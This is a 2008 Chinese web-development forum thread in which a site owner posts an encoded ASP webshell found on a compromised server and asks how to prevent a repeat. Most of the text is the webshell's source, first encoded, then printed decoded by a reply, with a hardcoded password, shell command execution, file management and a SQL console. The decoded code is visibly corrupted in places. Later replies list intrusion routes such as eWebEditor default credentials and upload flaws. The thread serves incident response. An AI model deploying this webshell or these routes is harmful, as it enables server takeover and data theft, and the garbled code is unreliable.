网站被入侵,下面是他留下的代码,经过加密的,据说是什么心动asp吧的,该采取什么措施防止类似的事情发生?

lionz1023 2008-01-04 04:44:39
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^fJsBAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n ~EW0.P{Y.;@#@&6U,2.DK.,InkEs+Pg+XOPE@#@&jk+.Km//{El(m69E~P,P,P~P~~,P~P,~P,P~v修改密码@#@&:HCs+xJ心动吧zjh在线O+Z!F!%8 r~@#@&?rYj]J{JtDOw=zzSAARm416[R^GsJ~P,~P,P~~,PPv网站@#@&ZGwH.bo4D'r只用于检查网站是否安全R如有违法使用者应付法律责任R与本作者无关rP,~PE版权@#@&bG'Ec閉關勿t#自发研究)须要多维思想而且要想不可能为可能的人才能做到]心動吧DerPP,v广告文字@#@&@#@&kE8Pj4Kh3DMc#@#@&~~&0P3.MPPtU@#@&~,P,IIUJ@!8D@*@!CP4DnW{BLm-lkmDb2O)4kkYGDz (l^3vbB@*@!8.@*[x8daiEPL~AD.cf/mMkaOkKx~[,J@!&m@*@!(.@*r@#@&,~~PADMR/VnCM)]+k2W /n wVEd4@#@&~PAU9P(6@#@&+x9Pk;4@#@&jE(P]]U`/D.#@#@&dMndwKxk+ h.rD+c/D.#@#@&3U9P?;8@#@&oE ^DkG P"+nmY4c?*@#@&P,InKmYt{]+aVl1nc?BJ'JSJwwr#@#@&AUN,s;U1YkGU@#@&oE ^DkG P"I+hlD4`U#@#@&,P]]nlD4'"+w^C^+v?BJw-ESr-E#@#@&2 N~o!xmOrKx@#@&`]d'];!+/DRUnD7+..mDrC(V+kcJ`ISrb@#@&U+M\nD(K{In;!n/DRjnM\+.#mDrl(s/crS}Zbd{z9f"Jb@#@&b^ObWx{]+$E+kOcJzmDkGxEb@#@&]WKOnmY4xU+D-nMR\laKmY4vJcJ#@#@&q "WGY{?n.7+Dc\lanlD4cJJJ*@#@&/n.7+.E{.+$EndDR/n.7+.\m.bl8^+k`J4YD2{4WdYr#';MV@#@&d+M\+M2xEk+MwC/d@#@&sGV9nDhlO4{I+5;/O`roKV[DhlY4J*@#@&w1C:']n$E+kO`rs1mhnJ*@#@&ACmViMVxJ@!8D@*@!8.@*@!mnUD+.@*@!C,t.0{BLm\mdmMk2Y=trdDWDH 4mm3vbv@*返回@!zm@*@!z^n YnD@*E@#@&I]jr@!tOh^@*@!:OmP4DYaO+$Eb-'rJ/W YnUDOKH2+rJP1GUYxD'EJOnXY&tDhVpP^4mD/nO{o8 2qyJE@*J@#@&I"?r@!YbYs+@*J'hgl:'J,OPr'j+M\D(n'E,@!&YbOV@*E@#@&IIjE@!/OX^n,Yza+{JJD+XOz1/dJr@*E@#@&IIUE4KNXBO[ 6W YR/r")~Fy26p4C^0oDG; NRmKsKDl[cWci1W^GD=an+iNE@#@&I"jJbxw!OS/VmO~OnXYCDC 6WUO /k"n=Pq aap4C13TDW!x9RmKVGD=a[[9i4K.ND)82aPkW^k[P:W60NJ@#@&I"?E ; 4C^0o.W!U9O^KVKD)[cW*i(W.NDlTa68r@#@&"I?r ^:9 (l^3L.KEUN ^W^W.l[!!TI1WsWMl[sow8r@#@&"IUE4KNz sl.Lbx),TwXi:m.Lk O^+WYl*a6I8r@#@&"IjEm mGsKDla9[9iO6DONmK.lDkGx=PUG +i)C)4W\.`mKVKDlDn[p4Cm0LDKEU[=a!TT)J@#@&"]UJ m:PmW^WMlaR%0i6WUO /k.n)8FwXINJ@#@&"IjJ@!&kYzV@*J@#@&]]UJ@!d^Mk2Y,smxL!lT+'Nl7C/1DrwD@*W; mYbGx,3k^s3DMWM/c#`.Y;D ~YMEnI)hkU[Kh W nMDGM'0kV^2M.WM/IJ@#@&]]UJ0!UmDkW ~z+kW0`b rW,`^W WkM:cEr确认要执行此操作吗?JJbbM+OEMU,Y.!+p+Vk+,.+DE.x,0Csk+i)E@#@&IIUEWE mDkGx~.!x/VK^3v#`O4+KrhPxPSr NGSRk+Y:ksnW!YcJrD;U;VW1V`*JJB~q!Z#p\CD~OKNCX,xP +A~GlYnc*i-lM~9kdaVmX',YK[lHROWdW^C^+?D.k o`*IAk NKh /OCDEd'rE→JLb9'rPPRRrJQNbdaVCHi)DE Z^Gm0`bir@#@&]"?J6;x1YkKU~?4WSsGV[nM`oW^[+M#`OKwRC[9DWWMhcsG^NDnmY4 \mV;+,'~oKVN.iDWwcC[NM0KDhRd;(:rYvbi)J@#@&"I?EW!x^YbG Po!V^sWM:vo1m:n~wb^ObWx*`YKwR4r[+6WM: sHCs+ \msEPx~w1lhnpkW`w)1YrKx{'JrZK2Xwks+rJb`G1lsnP{PwMGhwD`rJ请输入复制到目标文件全名称EJSoglh+*IYKw 4bN+WGM: sgCs+ 7l^E+,_{~Jruku-JEQG1lsni)+Vkn~k6`wb^YrG 'xJr\W7+or^+JEbPfHlsn,'~aDK:wD`rE请输入移动到目标文件全名称Jr~o1m:nbpYWa tbN+6G.:csglh+ -mV;+,Q',JEk-uuEE3fHlsnp8n^/Pk6`w)mDkGx{'EE;WwHoW^N+MEE#Pfglh+~x,w.Ws2YvJE请输入移动到目标文件夹全名称Er~sHCs+biDGaR4bN0WM:co1m:nR7ls;P_{~Jruu-kEJ3fglh+INVd+,r0vs)^DkWUx{JEHK-sG^NDJr#P91m:nP{P2.K:wDcJr请输入移动到目标文件夹全名称JJBoHls+*iOW2 4k[+6GDsRoHm:+ -mV;+,Q{PEru-uurJ391m:ni)+sdPk6cszmYbGU'{Jr1nhoG^NnDrE#PfHCs+Px~aDG:aOvJE请输入要新建的文件夹全名称rJBs1m:biDW2R4k[n6WDs sgl: -l^EPxP9Hm:ni)nVk+~r6`s)^DkGx{xrJ/M+mY+tN(EJ* 91m:n~{PwMG:aY`rE请输入要新建的\N(文件全名称~注意不能同名!rJSsHCs+biDGwctr[0W.hcsHlsnc\C^EP',fgC:iN+^/n~b0`w)mDkW xxJrZK:2l^OtN8Jrb G1ChP'~2MWhwDcrJ请输入要压缩的\94文件全名称B注意文件是否存在!JJBsgC:#IYKw 4bN+6GDsRsgCh+c\mV;+~x,fHlsni)+sd fHCs+~',ErrO4+MJJp8bW`G1C:"xU!VV*`YKwR4r[+6WM: b^ObWUR7CV!+~x,sb^ObWUiDGaR4bN0WM:cdE(:rYv#INV/`YKwR4r[+6WM: sHCs+ \msEPx~rJJEI)8E@#@&]"?E6E mYbW ~f(Z4+13cbPk0v94wWDs 94UYMR-ls;Px',EJrJb`mV+.OvJE请先连接数据库Jrbps;^VG4?DDvT#pDnY!DU~6lVkni)D+D;.x,YMEniNE@#@&]IUE0!x^ObWx~o!Vsf(jDDcb#Pk0vk@!T#PDnY!DU~6lVkni)?YM~xP +SP)D.CH`q *I?DD,TYP'~Ern.W7r9+.{HbmDK/KWYc9nYcrJ3GARW !pflDC~?KEMmn'E'"+KlD4`U+ddbWxcEwWsN.hlO4J*#[r-'[4c:[4p9nO,rSA9A=flDC8lk+,nC/dAKD['CMerJIjDD$qD,'~Jr9Mk-D{ ?$V,j+M\nD)ijnM\+MxJL?+M-nD&nLJSF*f2i9lDC4m/nxG41Chiik9xklIhh9'eCeCEJp?OD] D~{PJr9Db\+Mx`HH?$VNijnM\nD{E[U+.-DqK'riKWMO{&fZvpflDl(C/'94glhnpjk9xDKWYpKAN{eCeMJEIUY.$2DP{PEEG/xx9kxHlsnrJIUYM$cYP{~Jr?3SAZP~CPs"6H,$Km8s+gls+DP uAI3P&9@!8!TEri?O.]*DP{~rJ(g?AIK,qgPr,$Pl(VnHm:+YcjU2IBK)?U#,.)Si3U`wB!d+MxCh-BSwEwC/kAKD['B*JJp?D.$+T~',JE9AS2:3PwIrt~,Km4^+HlhnYP CA]2,q9x8!!EEp?OD]{YPx,JrjnGb:3P]KC4^+HCs+T,j2:PjU3]''B!/nDUCs+wB, CAI3~&f'qTZJEiUOM$0YP{PJrZ"3b:2~KzAJ3,$Km8V1lsnD`&f,qHK~(G2HK&P5,`qS8#PH6:PHjdJBjjAI,.b"Z_)Iv*T#*JEIUYD]1T,'PrE9I}n,K)AJ3,$Pl(s+glhnYJJIjDD,FZD{PErbdK2"P:)Ad2~$:l8s1lsnT,bfG~/rdjt1~n)jUP#b"/CzIcfy#JEIUY.$8qY'~rJzSKAI,Pb~S3P]KC8^+1mh+YPf"6KP;rdj\1~Kz?jJrI?DD,qyT'~Er当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现Rwx超过一条数据只显示字段的前五十个字节。rEpkWvk@!'&* G8sKDhRG4jOMR\msEP',jOD]kYi94oGM: ?$s?DD -mVEn~{PEJrEpl81RbxxD_PHd'EJ@!mnUD+D@*请确认己连接数据库再输入jpd操作命令语句。@!z1nUYD@*JEiNn^/nPbW`b'xqy# CsDO`UOM$rY#p8+^/`f(sGDsRj5^?YM \mVE~xPUYM$rTINM+OEMUPDD;np8J@#@&"IjJ6; mObW Ps!V^j;^?ODv/O.Bwo*`k6`f(oGDsRG4jY. 7lsE VxLO4@!*b`mVnDDcrJ请检查数据库连接串是否正确ZrJ*iDY!.x,0CVk+INb0`kODcV+ LOt@!FZ#`lsnMYcJr请检查jpd语句是否正确"EE*iDnO!DUP6C^/np8G4sKDs ?$VjYMR-C^E+,xPkYDp98sKDsRKlLnc\CV!nP{P2Lpl4^ bxU+Mu:HJ{JrJJpf(oWM: /!4hrD`#p.+DED ~OD!+p8E@#@&]"?E@!JdmMk2O@*J@#@&.M/~J@!8KNzrP@#@&q6Pz^YbWU'rJ~O4+x,]IUPJ,d^DKV^'UWE@#@&D./,E@*r@#@&9b:P68:`q&B+*@#@&}4:`!B!*~',JjmMk2Obxocok^+?HdO+sr(LnmOE@#@&~P}8Kv!S+*P'~E文件操作组件r@#@&r(PvFSZ#,'Prhk^DbwORktns^J@#@&~P}4KvqS *P{PE命令行执行组件J@#@&}4P`yS!*Px~rbf6pcZCYmsKoE@#@&,Pr(Kv+~y#~',J)/;2?U建库组件E@#@&r4:cf~Z#,'~JB]}RB+D3xTkUnr@#@&~~}4P`2Sy#~{PrbZ;2Uj压缩组件J@#@&64:`*SZ#P{~JUmDb2Ok ocfrmOrKxCDHEP@#@&~~}4Kc*B bP{~r数据流上传辅助组件J@#@&r(K`l~ZbP{PEb9W[8cmW U+1YkKUE@#@&P,r8KcXB bP{~J数据库连接组件r@#@&6(K`SZ#~',EzNG94c?YM+mhJ@#@&~P}4Pc+~ *~',J数据流上传组件J@#@&64:`F~T#~x,JjW6ObMYrdmx/ obVnjaE@#@&~,r(K`F~ybP{PE?zOor^+ja~文件上传组件J@#@&r(Pc%B!*PxPEJH0iw^Gl9Ri2^Wl[obVnJ@#@&,P6(Kv%~y#,xPr刘云峰文件上传组件J@#@&}4PcO~!*~',Jn.dkD/cj2VGC9RqJ@#@&P,r8Pv,~+b,'~Jzjhj2^WmNP文件上传组件r@#@&64:`q!B!b~{PJx\lbVRUhOwtlbVE@#@&~,r8Kvq!B b~{PJB\mksP邮件收发组件r@#@&r8:`8F~Z#,xPrZ9rgKj g+htCk^J@#@&~~r(KvFq~+b,'~J虚拟U\Kh发信组件J@#@&}4Kcqy~T#,x,JjsYaHlbVcj:Dw\lbV qr@#@&,~r(K`8+S *P{PE?hOaHCk^发信组件E@#@&r8PvF&ST*PxPr\bm.K/K0Yc(tJC:KKJ@#@&~~}4Kvq&B #,x~J数据传输组件
...全文
1019 16 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
16 条回复
切换为时间正序
请发表友善的回复…
发表回复
spritesky 2008-09-17
  • 打赏
  • 举报
回复
感到木马功能一般,感到入侵你网站的应是个菜鸟,连默认的密码都没改...
你网站肯定有漏洞的
具体是什么漏洞要你自己去查了
spritesky 2008-09-17
  • 打赏
  • 举报
回复
很简单的加密,我已经给你解密了。
是一个ASP大马
<%@ LANGUAGE = VBScript.Encode %>
<%
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next '
UserPass="abcxd" '修改密码
mName="心动吧ASP在线-20070812"
SiteURL="http://www.abcxd.com" '网站
Copyright="只用于检查网站是否安全.如有违法使用者应付法律责任.与本作者无关" '版权
AD="(閉關勿M)自发研究:须要多维思想而且要想不可能为可能的人才能做到[心動吧]*" '广告文字

sub ShowErr()
If Err Then
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear:Respo-se.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Fu-ctio- RePath(S)
RePath=Replace(S,"\","\\")
End Function
Fu-ctio- RRePath(S)
RRePath=Replace(S,"\\","\")
E-d Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
W.WRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="<br><br><center><a href='javascript:history.back()'>返回</a></ce-ter>"
RRS"<html><meta http-equiv=""Co-tent-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>"&mName&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td2fo-t-size: 12px;backgrou-d-color:#444;color:#eee;}"
RRS"input,select,textarea2font-size: 12px;background-color:#ddd;border:1px solid #fff}"
RRS".C2background-color:#444;border:0px}"
RRS".cmd2background-color:#000;color:#FFF}"
RRS"body2margin: 0px;margi--left:4px;}"
RRS"a2color:#ddd;text-decoration: no-e;}a:hover{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
RRS"<script language=javascript>fu-ction killErrors(){retur- true;}window.o-error=killErrors;"
RRS"functio- yesok()2if (co-firm(""确认要执行此操作吗?""))return true;else return false;}"
RRS"fu-ction runClock(){theTime = wi-dow.setTimeout(""runClock()"", 100);var today = -ew Date();var display= today.toLocaleStri-g();wi-dow.status=""→"&AD&" --""+display;}ru-Clock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}"
RRS"functio- FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FActio-==""MoveFile""){DName = prompt(""请输入移动到目标文件全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名称"",FName);top.hideform.FName.value = DName;}else if(FAction==""CreateMdb"")2DName = prompt(""请输入要新建的Mdb文件全名称,注意不能同名!"",FName);top.hideform.FName.value = DName;}else if(FActio-==""CompactMdb"")2DName = prompt(""请输入要压缩的Mdb文件全名称,注意文件是否存在!"",FName);top.hideform.FName.value = DName;}else2DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"fu-ctio- DbCheck(){if(DbForm.DbStr.value == """"){alert(""请先连接数据库"");FullDbStr(0);return false;}return true;}"
RRS"function FullDbStr(i){if(i<0){return false;}Str = -ew Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver=2Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] .HERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] .HERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' .HERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。"";if(i<=3)2DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>请确认己连接数据库再输入SQL操作命令语句。</center>"";}else if(i==12)2alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}"
RRS"fu-ctio- FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""请检查数据库连接串是否正确!"");return false;}if(str.le-gth<10){alert(""请检查SQL语句是否正确!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();retur- true;}"
RRS"</script>"
rrs "<body"
If Action="" then RRS " scroll=no"
rrs ">"
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripti-g.Dictionary"
ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.co-nection"
ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "数据传输组件
beyondamane 2008-01-10
  • 打赏
  • 举报
回复
应该是在服务器上上网后造成的,我也遇到过这样的问题
lionz1023 2008-01-10
  • 打赏
  • 举报
回复
哎,结了吧。无聊的很啊,源码大不了我不要了,但是每次访问主页,都他妈提示又病毒,eweb的后台我还真没改,不过他不是这样进来的。
9611122 2008-01-08
  • 打赏
  • 举报
回复
无聊的家伙,有能耐干微软

最看不上这种小人得志的样子

Autd.net
QQ:37389402
MSN:service@autd.net
http://www.autd.net
http://www.autd.net/uk (英文)

Tr4c3 2008-01-08
  • 打赏
  • 举报
回复
ewebeditor编辑器的默认密码你修改了么
http://www.site.com/ewebeditor/admin_login.asp
登录上传木马
http://www.site.com/ewebeditor/db/ewebeditor.mdb
默认数据库地址也要改

很大可能就是利用你这个默认配置的编辑器传的马
braveboy 2008-01-08
  • 打赏
  • 举报
回复
看你的服务器日志,看他从那里进来的
lionz1023 2008-01-08
  • 打赏
  • 举报
回复
这个加密文件的明文我已经找到了 就是asp心动吧出的,可以搜到,无非是一些打包啊 下载啊 放木马 得权限等等功能看上去很全,我就是不太清楚他是通过什么漏洞把这个页面传上去的。可能是上传漏洞 ,但我看了下我的上传都,在我认知里是 没有什么漏洞了,
什么都不能 2008-01-04
  • 打赏
  • 举报
回复
解码工具
先给你的文件解码,然后看一下是什么内容再说
lionz1023 2008-01-04
  • 打赏
  • 举报
回复
上传主要是用ewebeditor的,
还有一个是自己修改的,明天把代码贴上,高手们帮看看又什么漏洞!
还有溢出漏洞是怎么形成的?
当初测试的时候用过名小子,和老兵。都没有问题。
yousite1 2008-01-04
  • 打赏
  • 举报
回复
还有那段代码可以解密的
aspdecoder
yousite1 2008-01-04
  • 打赏
  • 举报
回复
看样子是上传漏洞,你检查一下上传文件的地方和上传组件.
lionz1023 2008-01-04
  • 打赏
  • 举报
回复
刚找了个没加密的,这东西是挺厉害的
to:hanpoyangtitan 失传漏洞该怎么打补丁
to:gingerkang A:上传有可能B没可能C没有看过d 注入漏洞,我也测试过些,基本都能防e数据库改 .cgi也测试了些数据库下载。现在正在服务器上用"人家"的程序做测试呢,看看到底能得到多少东西!
不过还好没有挂码,要不老总非搞我一顿!
什么都不能 2008-01-04
  • 打赏
  • 举报
回复
看样子是失传漏洞
gingerkang 2008-01-04
  • 打赏
  • 举报
回复
皮之不存,毛将焉附?
方案:
1.撤掉网站不做了
2.静态网站
3.动态的,修正一切漏洞
4.主要漏洞,A.上传B.后台access库备份C.后台写配置文件D.注入sqlserver DBO权限差异备份,E.access改asp后插入可执行代码
只想到这么多,后面的来补充.
lionz1023 2008-01-04
  • 打赏
  • 举报
回复
代码太长,大概就是这个意思了,高手回答该怎么预防!

28,409

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧